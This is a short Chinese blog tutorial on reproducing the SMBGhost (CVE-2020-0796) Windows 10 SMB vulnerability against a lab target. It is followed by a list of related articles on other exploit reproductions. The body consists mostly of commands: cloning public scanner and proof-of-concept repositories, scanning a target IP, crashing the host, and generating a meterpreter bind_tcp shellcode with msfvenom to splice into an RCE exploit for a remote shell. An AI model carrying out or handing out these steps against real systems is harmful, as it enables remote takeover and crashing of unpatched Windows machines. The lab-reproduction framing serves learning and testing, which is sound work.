win10永恒之黑漏洞复现

简介: win10永恒之黑漏洞复现

漏洞检测

检测工具:https://github.com/ollypwn/SMBGhost

先下载

git clone https://github.com/ollypwn/SMBGhost

进入工具目录

cd SMBGhost/

用python3调用scanner.py

python3 scanner.py 192.168.28.135

靶机192.168.28.135自身确实存在漏洞。

漏洞攻击

poc:https://github.com/eerykitty/CVE-2020-0796-PoC

先获取工具

git clone https://github.com/eerykitty/CVE-2020-0796-PoC

进入工具目录

cd CVE-2020-0796-PoC/

Pip3下载依赖工具

pip3 install ntlm_auth

靶机蓝屏

0X05 getshell

脚本下载:.

Git clone https://github.com/chompie1337/SMBGhost_RCE_PoC

生成反向连接木马

本地端口可以随意指定 -f 文件类型 -o目标文件名

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=6666 -f py -o nb.py

用生成的shellcode将exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)

相关文章
|
7月前
|
SQL 安全 测试技术
渗透测试基础之永恒之蓝漏洞复现
对于当下来说我们使用的电脑大多是win11或是win10,还是有很多政府和公司,或是学校中使用的系统还停留在win7系统.今天是我进行渗透测试的第一次实战,通过永恒之蓝漏洞利用对win7系统进行渗透,当然也会对渗透测试的流程进行一个详细的介绍.,渗透测试的流程信息较为详细,内容较多,如果想看实战流程,直接通过通过这次的渗透测试,虽然不是对web间进行渗透测试,但是通过实战能够使我能够熟悉渗透测试的流程,当然在实践过程中也出现了很多问题,例如从kali上传文件到win主机路径出现问题,配置攻击模块时将ip地址设置错误,但在我不断的思考和尝试下,最终解决了问题,对于我的解决问题的能力也是一种提升.
371 3
|
7月前
|
安全 网络安全 Windows
永恒之蓝(ms17_010)漏洞攻击原理与防护加固
通过nmap检测到目标服务器开放445端口,疑似存在MS17_010(永恒之蓝)漏洞。利用MSF的eternalblue模块成功入侵,获得system权限,证实漏洞存在。随后,通过禁用并停止Server服务进行加固。再次尝试攻击,显示加固有效,攻击失败。
821 0
|
监控 安全 测试技术
ms17-010(永恒之蓝)漏洞复现
ms17-010(永恒之蓝)利用的端口是445端口。 本文主要讲解ms17-010(永恒之蓝)漏洞复现,分为四个部分:了解渗透测试流程,使用nmap工具对win7进行扫描,尝试ms17-010漏洞利用,结果展示。第一部分“了解渗透测试流程”可以略过,可以直接从第二部分“使用nmap工具对win7进行扫描”开始看起。
1149 5
ms17-010(永恒之蓝)漏洞复现
|
安全 网络安全 Windows
CVE-2017-0143永恒之蓝复现
CVE-2017-0143永恒之蓝复现
144 0
|
运维 关系型数据库 MySQL
绕过360安全卫士提权实战案例
绕过360安全卫士提权实战案例
432 1
|
安全 Shell Linux
kali (永恒之蓝MS17_010)漏洞复现
kali (永恒之蓝MS17_010)漏洞复现
228 0
Potato土豆提权工具绕过防护思路-1
Potato土豆提权工具绕过防护思路-1
214 0
|
安全 网络安全 Windows
向日葵RCE复现 | CNVD-2022-10270 CNVD-2022-03672
向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。 于2022年2月5日和2022年2月15日,CNVD公开上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。
476 0
向日葵RCE复现 | CNVD-2022-10270 CNVD-2022-03672
|
安全 网络安全 虚拟化
windows10永恒之黑漏洞复现
windows10永恒之黑漏洞复现
2247 0
|
安全 网络安全 开发工具
CVE-2020-0796永恒之黑漏洞浅谈与利用
CVE-2020-0796永恒之黑漏洞浅谈与利用
596 0